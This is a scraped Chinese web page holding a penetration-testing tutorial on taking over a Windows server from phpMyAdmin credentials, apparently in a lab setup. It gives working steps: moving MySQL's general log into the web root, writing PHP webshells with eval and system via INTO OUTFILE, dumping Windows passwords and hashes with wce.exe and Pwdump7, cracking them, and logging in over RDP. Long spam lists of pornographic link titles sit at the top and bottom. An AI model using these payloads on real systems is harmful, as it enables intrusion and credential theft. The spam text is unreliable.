成人怡红院-成人怡红院视频在线观看-成人影视大全-成人影院203nnxyz-美女毛片在线看-美女免费黄

站長資訊網
最全最豐富的資訊網站

關于phpMyadmin提權那些事

下面由phpmyadmin教程欄目給大家介紹關于phpMyadmin提權那些事,希望對需要的朋友有所幫助!

關于phpMyadmin提權那些事

引言:在滲透測試過程中獲知到phpMyadmin的賬號密碼,如何進行提權呢?往下看,我今天和你說說phpMyadmin提權那些事。

0×00 定義

phpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網站主機上的MySQL的數據庫管理工具,讓管理者可用Web接口管理MySQL數據庫。

0×01 環境準備

目標: Windows Server 2003 Enterprise x64 Edition    192.168.17.137攻擊機: window7 192.168.17.132Php:5.45Mysql: 5.5.53Apache: 2.4

0×02 開始滲透

我們經過弱口令,爆破,目錄泄露等途徑已經獲知PhpMyadmin的賬號密碼是root root。接下來我們就通過phpMyadmin來提權,盡可能貼近真實,多講思路。

a 收集有用信息

關于phpMyadmin提權那些事關于phpMyadmin提權那些事

如上圖所示,我們可以獲取到以下有用信息。

  • 1.操作系統是windows server 2003 x86
  • 2.服務器是Apache 2.4.32
  • 3.網站默認路徑是 E:phpStudyPHPTutorialWWW
  • 4.PHP版本是 5.45
  • 5.mysql版本是 5.5.53

b 檢測插入條件

在上面我們已經獲知了網站默認的路徑是E:phpstudyPHPTutorialWWW,這個時候我們肯定想插入一句話后門文件或者是導出shell。那如果我們需要使用以上兩種思路中的一種必須滿足一個前提條件“secure_file_priv”對應的值不能為空且必須為默認網站的路徑,所以我們必須提前檢測一下“secure_file_priv”的值。

phpMyadmin執行以下命令:

SHOW VARIABLES LIKE “secure_file_priv”;

結果如圖所示:

關于phpMyadmin提權那些事

從上圖得知值為空,如果我們這時導入一句話,肯定會失敗的,不信啊,那我們試試。

關于phpMyadmin提權那些事

報錯The MySQL server is running with the –secure-file-priv option so it cannot execute this statement,這是因為mysql對通過文件導入導出作了限制,默認不允許。默認value值為null,則為禁止,如果有文件夾目錄,則只允許改目錄下文件(測試子目錄也不行)。我們思考一下看看能否設置其的路徑為我們的默認網站路徑,這樣我們就可以導入一句話后門了。那我們試試吧。

關于phpMyadmin提權那些事

從圖得知這個變量是一個只讀變量無法動態更改,那應該是只能從配置文件中更改了。到這里發現陷入了一個胡同,那常規方式不行,我們可以去使用一些騷思路,利用log日志文件插入一句話。

c 轉換思路

我們首先需要檢測的是MySQL全局變量(general_log、general_log file)的值。

  1. general log 指的是日志保存狀態,一共有兩個值(ON/OFF)ON代表開啟 OFF代表關閉。
  2. general log file 指的是日志的保存路徑。

關于phpMyadmin提權那些事

從圖得知general_log默認是關閉的,log日志存放的位置是E:phpStudyPHPTutorialMySQLdata。

首先我們來理解一下開啟general_log 的作用,開啟它可以記錄用戶輸入的每條命令,會把其保存在E:phpstudyPHPTutorialMySQLdata下的一個log文件中,其實就是我們常說的日志文件。好,我們的利用的思路是開啟general_log之后把general_log_file的值修改為我們網站默認路徑下一個自定義的php文件中,然后我們通過log日志進行寫入一句話后門到上面去,然后再進一步利用。

具體命令是:

set global general_log = "ON";SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/infos.php';

關于phpMyadmin提權那些事

關于phpMyadmin提權那些事

緊接著我們可以看到在網站根路徑下找到我們生成的偽日記文件infos.php。

關于phpMyadmin提權那些事

然后我們就得插入我們的一句話后門了。

select ‘<?php eval($_POST[yumu]);?>’;

關于phpMyadmin提權那些事

我們可以嘗試使用菜刀連接,成功連接。

關于phpMyadmin提權那些事

d 獲取管理員密碼

0×00 直接獲取明文

我們上傳wce.exe獲取明文密碼。運氣賊好,直接獲取到明文(11位字母和數字混合的密碼)。如果不能直接獲取明文那就得走第二條獲取hash值然后解密了。

關于phpMyadmin提權那些事

0×01 獲取hash值

上傳Pwdump7.exe獲取hash值保存到password.txt文件中。獲取hash值可以選擇在線http://www.objectif-securite.ch/en/ophcrack.php跑,跑不出來就用Ophcrack導入彩虹表跑吧。

關于phpMyadmin提權那些事

關于phpMyadmin提權那些事

e 查看3389是否開啟

直接在菜刀終端輸入“netstat -an | find “3389″ 或者“netstat -an ”。

關于phpMyadmin提權那些事

發現3389沒開,但是3390就開了,我們嘗試連接一下。

f 登陸服務器

運行mstsc開啟遠程桌面。

關于phpMyadmin提權那些事

關于phpMyadmin提權那些事

輸入上面獲取到的賬號和密碼,成功登陸。
關于phpMyadmin提權那些事

最后肯定是要清楚痕跡的,但我這里就不寫了,寫的內容也是賊多了

0×03 擴展

上面演示了secure_file_priv值為空的情況,那么如果secure_file_priv不為空那我們該怎么辦?

a 配置my.ini文件(不對應網站根路徑)

打開mysq的配置文件my.ini,對secure_file_priv的值進行設置,然后重啟mysql。

secure_file_priv = ”E:/phpStudy/PHPTutorial/MYSQL/”

關于phpMyadmin提權那些事

關于phpMyadmin提權那些事

嘗試改變值,發現只是可讀,不能寫,那種情況無法寫入我們的一句話,因為其限制了導出路徑,無法把一句話寫入之后導出到我們的網站根目錄。

關于phpMyadmin提權那些事

關于phpMyadmin提權那些事


b 配置my.ini文件(對應網站根路徑)

打開mysq的配置文件my.ini,對secure_file_priv的值進行設置,然后重啟mysql。

secure_file_priv = ”E:/phpStudy/PHPTutorial/WWW/”

關于phpMyadmin提權那些事

然后我們嘗試插入一句話后門,成功插入。

關于phpMyadmin提權那些事

二話不說菜刀連接。

關于phpMyadmin提權那些事

關于phpMyadmin提權那些事

當然一句話還可以這樣插入。

CREATE TABLE `mysql`.`informationes` (`inform` TEXT NOT NULL);INSERT INTO `mysql`.`informationes` (`inform`) VALUES ('<?php @eval($_POST[pass]);?>');SELECT `inform` from `mysql`.`informationes` into outfile 'e:/phpStudy/PHPTutorial/WWW/infos.php';DROP table if exists `mysql`.`informationes`;(注意: c:/phpStudy/PHPTutorial/WWW/為網站的絕對路徑)

c 導出具有命令權限的Shell的php文件

select ‘<?php echo ’<pre>’;system($_POST['yumu']);echo ’</pre>’;?>’ into outfile ‘c:/phpStudy/PHPTutorial/WWW/test.php’;

關于phpMyadmin提權那些事

關于phpMyadmin提權那些事

0×04 總結

本文中的環境是除了沒上waf其他都是盡可能地貼近真實環境,模擬真實的環境給大家去分析和講解思路,希望大家有所收獲。

贊(0)
分享到: 更多 (0)
?
網站地圖   滬ICP備18035694號-2    滬公網安備31011702889846號
野花香高清视频在线观看免费| 蜜芽亚洲AV无码精品国产午夜| 久久99精品久久只有精品| 久久99热精品免费观看| 毛茸茸的撤尿正面BBW| 欧美性色黄大片手机版| 手在线播放波多野结衣| 亚洲AV丰满熟妇一区| 野花电影在线观看免费720| 97在线无码免费人妻短视频| 成人欧美激情亚洲日韩蜜臀 | 欧美日韩精品一区二区在线视频| 日出水了好深好涨| 性生生活大片又黄又| 野花高清在线观看免费官网中文版 | 三级成人AV电影在线观看| 性做久久久久久久| 一本一本久久A久久精品综合| FREEZEFRAME丰满少妇| 国产XXXX69真实实拍| 精品国产一区二区三区香蕉 | 久爱无码精品免费视频在线观看| 女人带毛的真人图片| 特大巨黑吊性XXXX| 亚洲熟女丰满多毛XXXXX| 4444亚洲人成无码网在线观看| 粉嫩Av网站在线观看| 精品国产乱码久久久久久郑州公司| 农村妇女野外交性高清片| 四虎国产精品永久入口| 亚洲熟女丰满多毛XXXXX| 被俩个黑人前后破苞的女人| 国精产品一二三四区产品| 免费无码又爽又刺激动态图| 特级毛片A级毛片在线播放WWW| 亚洲日韩AV一区二区三区四区| ZOZOTOWN| 韩国乱码卡一卡二卡新区网站| 免费人成在线观看| 无码任你躁久久久久久久| 制服丝袜长腿无码专区第一页| 各种少妇正面着BBW撒尿视频| 久久大香香蕉国产拍国| 日韩日韩日韩日韩日韩| 亚洲熟妇色XXXXX中国少妇Y| 成人国产精品一区二区网站免费 | 亚洲综合区小说区激情区| 成人免费高清A级毛片| 精品无码久久久久久久久| 日本WV一本一道久久香蕉| 亚洲欧美日韩综合一区二区| 成人午夜福利免费无码视频| 久久久久久亚洲AV无码蜜芽 | 亚洲日韩精品无码专区网站| 丰满乳乱亲伦小说| 麻豆专媒体一区二区| 无套内谢少妇毛片免费看看| 99国产精品白浆无码流出| 国语对白刺激在线视频国产网红| 人妻巨大乳HD免费看| 亚洲日韩中文字幕日本| 丰满少妇A级毛片| 妺妺晚上扒我内裤吃我精子H| 亚洲AV成人精品一区二区三区| YYYY1111少妇影院在线观| 久草日B视频一二三区| 太紧了夹得我的巴好爽欧美| 97久久超碰国产精品2021| 黑人处破女免费播放| 涩反差合集91综合一区二区清纯| 中日双语字幕高清在线观看| 国产尤物亚洲精品不卡| 人妻无码一区二区不卡无码AV| 亚洲孕妇精品无码av| 国产精品一区二区高清在线| 強暴強姦AV正片一区二区| 亚洲综合久久一区二区| 国产日产欧产精品| 搡老女人老妇女老熟妇| 6080午夜三级中文在线观看| 精品熟女少妇AⅤ免费久久| 无码成人精品区在线观看| 婷婷亚洲综合五月天小说| 在线黄色网站观看汙| 韩国三级丰满少妇高潮| 色综合伊人色综合网站| A级大胆欧美人体大胆666| 久久精品国产亚洲AV高清热 | 亚洲乱码av无码一区二区三区 | 亚洲国产精品不卡AV在线| 国产成人无码AV一区二区在线观 | 男人女人做爽爽18禁免费| 亚洲人成无码WWW久久久| 国产精品无码素人福利| 日韩一区二区无码视频| AV怡红院一区二区三区| 蜜臀AV无码人妻精品| 亚洲日本一线产区和二线产| 国内精品国产三级国产AV| 四川妇女BBBWBBBWM| 成人片黄网站色大片免费观看AP| 欧美黑人XXXXXⅩ| 重生后我抛弃了负心公主| 久久人人妻人人妻人人澡av| 亚洲精品无码专区在线播放| 国产又爽又黄又刺激的视频| 无码人妻丰满熟妇惹区| 国产AⅤ精品一区二区三理论片 | 麻豆传播媒体免费版官网| 野花香视频免费观看| 久久97人人超人人超碰超国产 | 天美传媒蜜桃传媒精东豆| 大香伊蕉人在播放2019| 日本一线和三线的区别是什么| wwwxxx一区二区| 强被迫伦姧在线观看中文版| JAPANESE 大战黑人| 欧式春画图片大全欣赏简单| A级大胆欧美人体大胆666| 欧美激情ⅩXXXX免费视频| 99精品久久精品一区二区| 欧美VPSWINDOWS另类| 99久久精品无码一区二区毛片| 女人自熨全过程视频免费 | 国产大屁股视频免费区| 特级做A爰片毛片免费看108| 国产成人无码区免费网站| 玩弄丰满熟妇XXXXX性HD| 国产精品XXX大片免费观看| 无码国产孕妇一区二区免费AV | 插插射啊爱视频日A级| 日本亚洲色大成网站WWW久久| 抽搐一进一出再深一点| 少妇高潮惨叫久久久久电影69| 国产AV无码一区二区二三区J| 天天摸夜夜添夜夜无码| 国产精品露脸国语对白| 亚洲 欧美 国产 动漫 综合| 孩教小UXXXⅩ精品| 亚洲色成人网站WWW永久小说| 久久久久亚洲AV无码专区喷水 | 亚洲国产精品高清久久久| 精品少妇人妻AV无码久久| 一区二区三区中文字幕| 男女无遮挡猛进猛出免费观看视频| CHINA中国人CHINESE| 日韩AV一区二区在线| 国产成人亚洲综合无码8| 亚洲AⅤ天堂无码专区| 精品一线二线三线区别大吗| 中文字幕夫の上司に犯新沢平兰| 欧美性猛交aaaa乱大交| 丰满人妻无码∧V区视频| 香蕉免费一区二区三区| 久久99久国产麻精品66| 97人妻碰碰碰久久久久禁片| 日韩精品一区二区三区中文无码 | 高清播放器欧美大片| 亚洲18色成人网站WWW| 久久久久久久亚洲AV无码| 6080YYY午夜理伦三级| 日韩精品一二三区| 国产线路3国产线路2| 亚洲最大AV在线| 奇米精品视频一区二区三区| 国产超碰人人模人人爽人人添 | 久久久久久久人妻无码中文字幕爆| 236宅宅理论片免费| 日日摸夜夜添夜夜添无码免费视频 | 玩弄中国白嫩少妇HD乱| 亚洲AⅤ永久无码毛片牛牛影视| 尤物精品国产第一福利网站| 欧美性狂猛BBBBBBXXXX| 国产成人无码免费视频97APP| 亚洲成AV人片在线观看天堂无 | 国产69久久精品成人看 | AV无码动漫一区二区三区精品| 日韩国产女人久久久| 国精产品一区二区三区糖心269| 余生请多指教在线观看免费全集 | 亚洲AV无一区二区三区久久| 狼人视频国产在线视频WWW色| 啊灬啊灬啊灬快灬高潮少妇| 伊人久久中文字幕| 让女人受不了19种新姿势| 国产精品久久久久久久| 伊人久久大香线蕉成人| 三妻四妾免费观看完整版高清| 精品国产乱码久久久久久下载| MM1313亚洲国产精品无码| 性XXXX欧美老妇胖老太性多毛| 蜜桃AV无码国产丝袜在线观看 | 天堂在/线资源中文在线| 久久国产自偷自偷免费一区调| ZOZOTOWN| 亚洲精品无码久久久久牙蜜区| 青青草国产成人A∨| 精品久久久久久无码人妻蜜桃| Z Z〇Z〇另类女人ZOZ〇| 亚洲国产成人精品无码区在线秒播|